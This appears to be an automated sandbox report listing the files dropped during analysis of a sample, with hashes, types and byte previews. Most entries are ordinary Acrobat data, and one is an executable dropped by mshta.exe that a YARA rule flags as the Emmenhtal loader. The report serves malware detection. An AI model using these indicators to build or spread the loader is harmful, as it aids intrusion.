                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfbPtdPeUkwRe9:YvXKXasJpH0cORsGDV8Ukee9
                                          MD5:5DB4D863FD8822D6D04F458F330BE527
                                          SHA1:07CEAE47DF4EB93EFE3339BFF1B456BE462FEF89
                                          SHA-256:A71403E2F37A2EE5E984FCD17223EB12C639A76C881E17E42EA540D7CD39132A
                                          SHA-512:F0C9AEEDE66570D9BEDA049C423558F642EDED64BEB76A12895CB2E82C98A3FCCBFCEAAD4890FD5888BEABAA4F7D2AF33E3D818CC5B82E1BB1122181ADD1F619
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):287
                                          Entropy (8bit):5.265829162735097
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJf21rPeUkwRe9:YvXKXasJpH0cORsG+16Ukee9
                                          MD5:519B3F2F1619ED5B9F81C237386E8B90
                                          SHA1:B1C2F147A988F30D1B385FF07E6FCE2CFDD0F3F0
                                          SHA-256:EFC7A6ED14A39DB5C7158C63D3E0C40CA4DF7B87F0166870A90E1E77B7582CFF
                                          SHA-512:4BDA2914CC6761B5454FC12C8E4F4E3692C9E9C3F146BB837CD1902CE2F97A2EECEE3B0307C8342BB1DF6159A93F30B609BC21301F73F678193C60DCD1A2D715
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):1090
                                          Entropy (8bit):5.669094370421339
                                          Encrypted:false
                                          SSDEEP:24:Yv6XDp5KamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS1w:Yv0oBgkDMUJUAh8cvM1w
                                          MD5:7770FF1C86F0AE88E72C168F1FC2A579
                                          SHA1:EB87B805C93F103247A3D6FE5CA054ABC9089732
                                          SHA-256:FA8381877F436B72F8EB51B33F448B22CCC51BE8EDA451808E79095C73953C53
                                          SHA-512:6B8CCCE0CE29B143D151A5268CCB15DF87D5F9A72F6E7684D8E21AC9CA0D92829DDEE9F030678A344958D79176D272BED81DA6089BF014E070BD385B3AC35524
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):286
                                          Entropy (8bit):5.2426668674185075
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJfshHHrPeUkwRe9:YvXKXasJpH0cORsGUUUkee9
                                          MD5:24DCAF5AAC39358A5075ABB243EE7D43
                                          SHA1:74ACF79C51F5BFAADDCE8C896497996223BF1B6E
                                          SHA-256:C5C06472728ABC033CB8ED7DCE0FAC31B4F15BF8EBA31D0E02F893F71FCB1F1F
                                          SHA-512:434A723F00F8187B7A92C9CBCB8FEC8BF84274D85DE035E088A389CE9CC22EC5335D8FCEB1EA994F9FD063ECC0461CF87EA0896DE0FFB317C29E36C47F693417
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):282
                                          Entropy (8bit):5.254112654592129
                                          Encrypted:false
                                          SSDEEP:6:YEQXJ2HXailJpH0nZiQ0YHRDoAvJTqgFCrPeUkwRe9:YvXKXasJpH0cORsGTq16Ukee9
                                          MD5:390C44091652F13781486928FDF3D2F3
                                          SHA1:9744BB6E2AC674D79E1C8A34DFF7F62CAAA42FF1
                                          SHA-256:0BA31048DD8F6726F5A2E36DC77113D85FD7714FC771AD5A0173EC0D1545F37B
                                          SHA-512:BD8276BE4373F4BB3B0EF3DAD5A36BB6F233CDFBF0E5876EB5D83D2583E4656274E6B5E742E9BD19FFE2D98440828E13A261C0141679555774DA6F5B9B521424
                                          Malicious:false
                                          Preview:{"analyticsData":{"responseGUID":"18b70f1f-901f-4b0e-a0d7-4fa89ec567d4","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735817701707,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):4
                                          Entropy (8bit):0.8112781244591328
                                          Encrypted:false
                                          SSDEEP:3:e:e
                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                          Malicious:false
                                          Preview:....
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):2814
                                          Entropy (8bit):5.14026899327547
                                          Encrypted:false
                                          SSDEEP:48:Y3P/dGBHq6adVJUAxmNiwTOOkWOj8zj10PX6e9MLBLLMt:TZq6skMui2OO1kWg
                                          MD5:B148875F7529E1EF1B2FCF67CBB9FAD5
                                          SHA1:7CCCB7FCB8279D03814FEEAF259B67129EA39783
                                          SHA-256:0E60224EACBCC2385A1CDE7617F5993E6BEA710CB5D95F6300600F0FC7FEEABC
                                          SHA-512:967766440F2C2544FD4D2D8D7A8C4C295EDDC707222B58C14317E2066815753A06F2D238CBE9D1819BACA74CE6B6720DEFD8523B1D5D9DECF679FD4D32D941E4
                                          Malicious:false
                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d5e883ac1f266aa3c4cfa2e8429dbfc0","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1735637896000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"d65623998d7c42b4e7e5c88d0d709886","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1735637896000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"77bd876a2b2fb11427513fc080809949","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1735637896000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"8f99e9d5ca93d6d0601e3530ce6791fe","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1735637896000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"ae6ccd2cc992dce7bcd7a6c2f6b6b365","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1735637896000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"16ef439b78790cdf75fb809f6dd7d835","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                          Category:dropped
                                          Size (bytes):12288
                                          Entropy (8bit):1.1457970209247803
                                          Encrypted:false
                                          SSDEEP:24:TLhx/XYKQvGJF7urs2ERZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcm:TFl2GL7ms2GXc+XcGNFlRYIX2v3kdI
                                          MD5:FD1C87FC0B195E21C33AC47320CEDEDA
                                          SHA1:2207CC81B7B953FFA9A6DA9F14453EE2D538FEE5
                                          SHA-256:1B0654EA83EBE6CCCF5A09E03E131934D45158A884DEF9AE78B348DD7FEA71DA
                                          SHA-512:E6C236AECE516510BF61DF6B0B0902476C9CA4403D24F0EE65118EEC30F32A6FF165DE9D6CDC7C49369A8408A7034172CD87D0D5BEFF0D0B8421A006281E98FA
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:SQLite Rollback Journal
                                          Category:dropped
                                          Size (bytes):8720
                                          Entropy (8bit):1.5504597494249244
                                          Encrypted:false
                                          SSDEEP:24:7+tZEUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxhqLxx/XYKj:7MZJXc+XcGNFlRYIX2vEqVl2GL7msb
                                          MD5:0E56133F26C57E2D095FB353126E2076
                                          SHA1:1CACCEC570055AE6203810BB535F4A4CD8AA6E02
                                          SHA-256:B31F6B9910660ABB1ADAFEF941D45A8E2C6D1C517BCE51114E6DC47E5E66CC3B
                                          SHA-512:CAD5158776E1686F59A39603EEC461D9629AB4B66849BEC64077F364616B8D6C2BDAB7A8D3945A12AAF073A9C4E8EA4058D4C23D18B6545A806A0079B4B3EB57
                                          Malicious:false
                                          Preview:.... .c...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):66726
                                          Entropy (8bit):5.392739213842091
                                          Encrypted:false
                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgJ8TpQnP9rPnjU5LKBb7/PuLPeYyu:6a6TZ44ADEJapQnP9rPo5HTeK
                                          MD5:EB185C42D1B3275F8164AC641A335A01
                                          SHA1:188438699697B69568FA6A077112FD841A991431
                                          SHA-256:5E66BF40335B820FAB824E8CF4E681524DC46853E6D2A65B344EC9F2229FA90D
                                          SHA-512:B330723F526BEB3773CB5AF21BF54B281C2FA84E66A7149C175A5D61F403B951E7E82D6DC1860715FACFBFC46AE75DC939033FD5B9071F49EB79CC82AEF61C82
                                          Malicious:false
                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                          Process:C:\Windows\System32\mshta.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):462035
                                          Entropy (8bit):6.337495476941588
                                          Encrypted:false
                                          SSDEEP:6144:1+WoC/IdkUP25u+WoC/IdkUP253+WoC/IdkUP25B+WoC/IdkUP25I+WoC/IdkUPS:1pOk6pOkTpOkNpOk0pOk
                                          MD5:D394A49CC05730256F3DDC7E8084DC60
                                          SHA1:3CAE5669F89B2223384C22AFFBEEEEF16C410249
                                          SHA-256:AB2BDA4E7DC25A1EDC5EAF2D60045FF7CB732A924FF13336644027CD7966CD16
                                          SHA-512:BD9F568D7A9090D10C88CF63DE8D1E3AFCFE102E3274BD35EE9134274A5810713559535E0F984EA3EDBD90EAB0CA0F8D93C80BA90F792310C494993142FB3F96
                                          Malicious:false
                                          Yara Hits:
                                          • Rule: emmenhtal_strings_hta_exe, Description: Emmenhtal Loader string, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Havoc[1], Author: Sekoia.io
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...C...3...C...3...C...3...C...3...3...2...C...3...Cw..3...C...3..Rich.3..........................PE..L...........................T....................@.......................................@...... ..........................P$..,....`..(....................p.......1..T............................................ ..L.......@....................text...X........................... ..`.data...............................@....idata..D)... ...*..................@..@.didat.......P.......4..............@....rsrc...(....`.......6..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):0.34726597513537405
                                          Encrypted:false
                                          SSDEEP:3:Nlll:Nll
                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                          Malicious:false
                                          Preview:@...e...........................................................
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):246
                                          Entropy (8bit):3.5193370621730837
                                          Encrypted:false
                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8fQDiNUlI:Qw946cPbiOxDlbYnuRKuFUG
                                          MD5:B27B6D0E7EAA50B474571ADF150EE5C3
                                          SHA1:D4F8A54A3BD8E9B43730D72537312F269BB83E0E
                                          SHA-256:A20F2DEA9960DFE613ECB2F731994EF469C48CB66FB2064D9ACCF106E17F0907
                                          SHA-512:4457EB8F9A23241D9CFA4138FAAA9A65AB8737B42A078A879D1C9C1163EE93D94243F3501A5755E0BD8CB5C2ABFEA098F535542971B6EC295880110C0DC5CF7F
                                          Malicious:false
                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .3.1./.1.2./.2.0.2.4. . .0.4.:.3.8.:.1.7. .=.=.=.....
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:ASCII text, with very long lines (393)
                                          Category:dropped
                                          Size (bytes):16525
                                          Entropy (8bit):5.338264912747007
                                          Encrypted:false
                                          SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                          MD5:128A51060103D95314048C2F32A15C66
                                          SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                          SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                          SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                          Malicious:false
                                          Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):15114
                                          Entropy (8bit):5.367494606109248
                                          Encrypted:false
                                          SSDEEP:384:96O3WqbGvnY5Q+7MipNCM+rb8neyrLbcVq2y4wgA22Gd3n3DqNXJQ/Q5Iqg3UpRQ:WVt
                                          MD5:6339D312F59DFE1F35EBA9A287927E30
                                          SHA1:D8FA17257C3C1564B9F0B83AEF0771ADC485D27B
                                          SHA-256:648FD7E54F60B2A1066230B9E8EBC48517620AE449D740174964D375B26D5FB2
                                          SHA-512:E5F830B839FBAB148DFE1214611BE803F68E170569E80387A03E7D238E857C86C99535F3D03DFBED81767CD70991921328E471720A33CB24EC46D8D398B9D7CE
                                          Malicious:false
                                          Preview:SessionID=f55f2035-cf09-4df0-9c6c-158b05416a14.1735637890413 Timestamp=2024-12-31T04:38:10:413-0500 ThreadID=7880 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=f55f2035-cf09-4df0-9c6c-158b05416a14.1735637890413 Timestamp=2024-12-31T04:38:10:414-0500 ThreadID=7880 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=f55f2035-cf09-4df0-9c6c-158b05416a14.1735637890413 Timestamp=2024-12-31T04:38:10:414-0500 ThreadID=7880 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=f55f2035-cf09-4df0-9c6c-158b05416a14.1735637890413 Timestamp=2024-12-31T04:38:10:414-0500 ThreadID=7880 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=f55f2035-cf09-4df0-9c6c-158b05416a14.1735637890413 Timestamp=2024-12-31T04:38:10:414-0500 ThreadID=7880 Component=ngl-lib_NglAppLib Description="SetConf
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):29752
                                          Entropy (8bit):5.398391593102086
                                          Encrypted:false
                                          SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcb8cb+zIWkcbp:V3fOCIdJDeSEWr
                                          MD5:3ABFAA23311C8A5029ACC9C6826319A3
                                          SHA1:6A368A3836DEBF172FBE418091D21F2ABCB4471F
                                          SHA-256:D56F369D13DC42ABFCBEDE048A31698F22553B4C796D866E7A4637FFA81BD0FC
                                          SHA-512:329A365D32E94C29257B553B2F433628810048D73627DF76026BA0FB88BF931ED998E7F2E564A59E3A2682E106C5E60D5F1ABB0DC31377B2B1F9C2A363FB2FDC
                                          Malicious:false
                                          Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                          Category:dropped
                                          Size (bytes):1419751
                                          Entropy (8bit):7.976496077007677
                                          Encrypted:false
                                          SSDEEP:24576:uoD9WL07oXGZflYIGNPZdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:uy9WLxXGZNZGH3mlind9i4ufFXpAXkru
                                          MD5:130BE2FD618BFD72EFAE881EB827AE8F
                                          SHA1:943042DBAF8A8E2F70A79F41F6B0C76880D62803
                                          SHA-256:647467C57EE2B583A18E9946EA78CEC9265634A35F8A5E584097818DAA596004
                                          SHA-512:4741A8FC7E59C5260EA1AF15C3C82FA95625FE3CB1025F311C859B4F9732A126826C4E2FFDAACB7CF72CE15DD901AAC4F2152DACDF7AABAD07CA4A901DDEE9BC
                                          Malicious:false
                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                          Category:dropped
                                          Size (bytes):386528
                                          Entropy (8bit):7.9736851559892425
                                          Encrypted:false
                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                          Malicious:false
                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 634912
                                          Category:dropped
                                          Size (bytes):1407294
                                          Entropy (8bit):7.97605879016224
                                          Encrypted:false
                                          SSDEEP:24576:/ndpy6mlind9j2kvhsfFXpAXDgrFBU2/R07EGZf5ZwYIGNPzWL07oW:P3mlind9i4ufFXpAXkrfUs0wGZxZwZGf
                                          MD5:03FDCEEC7CEFA155EC3C965BE538D89B
                                          SHA1:FCFDFA1B002CB5E4C0A3D06EA11D5747721FDA0A
                                          SHA-256:BCEBA5BD63F4508C59CB1A8859663954A4070C93F4435A56B0CD2564A15D639D
                                          SHA-512:38F2254704A8D6F7E34ED64525A195E5E2210D91A680C2DDCFB40820C32F89FFABDF71BA8CB7FC2000342EA4E663991C92984718A3CAA22F565402B94F054152
                                          Malicious:false
